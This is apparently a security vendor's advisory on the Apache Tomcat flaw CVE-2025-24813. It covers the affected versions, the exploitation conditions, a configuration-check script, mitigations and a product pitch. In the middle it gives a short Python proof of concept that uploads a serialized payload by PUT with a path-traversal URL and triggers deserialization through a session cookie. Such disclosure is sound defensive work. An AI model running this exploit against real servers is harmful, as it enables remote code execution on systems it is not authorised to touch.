A critical security vulnerability, identified as CVE-2025-24813, has been discovered in Apache Tomcat, potentially exposing servers to remote code execution (RCE), information disclosure, and data corruption risks.
This flaw affects the following versions:
- Apache Tomcat
11.0.0-M1through11.0.2 - Apache Tomcat
10.1.0-M1through10.1.34 - Apache Tomcat
9.0.0-M1through9.0.98
Understanding CVE-2025-24813
The vulnerability originates from improper handling of path equivalence when processing filenames that contain internal dots. Specifically, when Tomcat’s default servlet is configured with write permissions (which is disabled by default) and allows partial PUT requests (enabled by default), an attacker could exploit this vulnerability to perform unauthorized actions. The original code, now patched in commit 0a668e0c, generated temporary filenames by replacing path separators (e.g., /) with internal dots (e.g., .), leading to flawed security checks and creating the conditions for exploitation.
Attackers leveraging this vulnerability could execute arbitrary code, access sensitive information, or corrupt server data. Such exploits significantly amplify the risks to an organization’s web infrastructure and data integrity.
Exploitation Conditions and Risks
If the following conditions are not met, your environment is not vulnerable:
- Write-Enabled DefaultServlet: The
readonlyparameter inconf/web.xmlmust be set tofalse, enablingPUTrequests (default istrue). - Partial PUT Support: Enabled by default, allowing attackers to manipulate file uploads.
- File-Based Session Persistence: Tomcat must use file-based session storage (non-default) at its default location.
- Deserialization Libraries: The application must include a library vulnerable to deserialization attacks, such as older versions of Apache Commons Collections.
When these conditions align, attackers can upload malicious serialized payloads, triggering RCE via deserialization. Even without RCE, the flaw permits information disclosure (e.g., accessing sensitive configuration files) or data corruption (e.g., injecting malicious content into uploaded files). The risks are profound: compromised servers could serve as entry points for broader network attacks, data theft, or persistent backdoors.
Quick Vulnerability Check Script
You can quickly verify if your Tomcat server might be susceptible by checking configuration settings with this short bash script:
readonly_value=$(grep -oP '(?<=readonly=")(true|false)' "$CATALINA_HOME/conf/web.xml" | head -1)
allowPartialPut_value=$(grep -oP '(?<=allowPartialPut=")(true|false)' "$CATALINA_HOME/conf/web.xml" | head -1)
echo "readonly: ${readonly_value:-Not Found}"
echo "allowPartialPut: ${allowPartialPut_value:-Not Found}"
# Check if settings are secure
if [[ "$readonly_value" != "true" ]]; then
echo "[!] WARNING: readonly is not set to true. Server may be vulnerable."
fi
if [[ "$allowPartialPut_value" != "false" ]]; then
echo "[!] WARNING: allowPartialPut is not set to false. Server may be vulnerable."
fiCopied
Ensure readonly is set to true and allowPartialPut is set to false.
Proof of Concept (PoC) and Active Exploitation
A publicly available Proof of Concept (PoC) exploit demonstrates the ease of exploiting CVE-2025-24813.
How the Exploit Works
The PoC consists of three key steps:
- Generate a malicious serialized payload.
- Upload this payload via an
HTTP PUTrequest to a vulnerable Apache Tomcat server. - Trigger deserialization by requesting a resource, executing arbitrary code.
Here’s a simplified Python example to illustrate these steps:
import requests
# Step 1: Malicious payload (created externally, e.g., ysoserial tool)
payload_file = 'payload.ser'
upload_url = 'http://target_server/uploads/../sessions/malicious.session'
# Step 2: Upload payload via HTTP PUT
with open(payload_file, 'rb') as payload:
response = requests.put(upload_url, data=payload)
if response.status_code in [200, 201, 409]:
print(f'[+] Payload uploaded successfully: {upload_url}')
else:
print(f'[-] Payload upload failed with status: {response.status_code}')
# Step 3: Trigger payload execution (e.g., visiting a JSP page)
trigger_response = requests.get('http://target_server/index.jsp', cookies={'JSESSIONID': 'malicious'})
if trigger_response.status_code == 500:
print('[+] Exploit likely succeeded, server error indicates payload executed.')
else:
print('[-] Exploit failed or server not vulnerable.')
Copied
Mitigation Steps
To protect your environment against CVE-2025-24813, the following immediate actions are recommended:
- Upgrade Apache Tomcat: Update to versions
9.0.99,10.1.35, or11.0.3, containing the necessary security fixes. - Disable Write Permissions: Set the
readonlyparameter to true within the defaultservletconfiguration (conf/web.xml). - Disable Partial PUT Support: If partial
PUTfunctionality is not required, disable it by setting theallowPartialPutparameter tofalse.
How Upwind Helps Mitigate CVE-2025-24813
Upwind provides real-time security monitoring and analysis to detect and prevent vulnerabilities like CVE-2025-24813 before they become critical incidents. With runtime process monitoring, Upwind automatically identifies unexpected file uploads, process executions, and suspicious activity within your environment.
Upwind’s Cloud Security Platform provides powerful tools to address and mitigate the risks associated with:
- Inventory Visibility: Identify which compute assets with Apache Tomcat.
- Vulnerability Management and Feed: Utilize Upwind’s SBOM Explorer to identify and monitor the use of Apache Tomcat throughout your environment, while receiving push notifications about any risks detected.
- Risk Prioritization: Understand the impact of this vulnerability in high-risk environments and prioritize upgrades or mitigations.
- Continuous Monitoring: Upwind provides real-time detection of configuration issues and alerts for potential exploits.
To learn more about how Upwind protects against emerging critical vulnerabilities, schedule a demo.
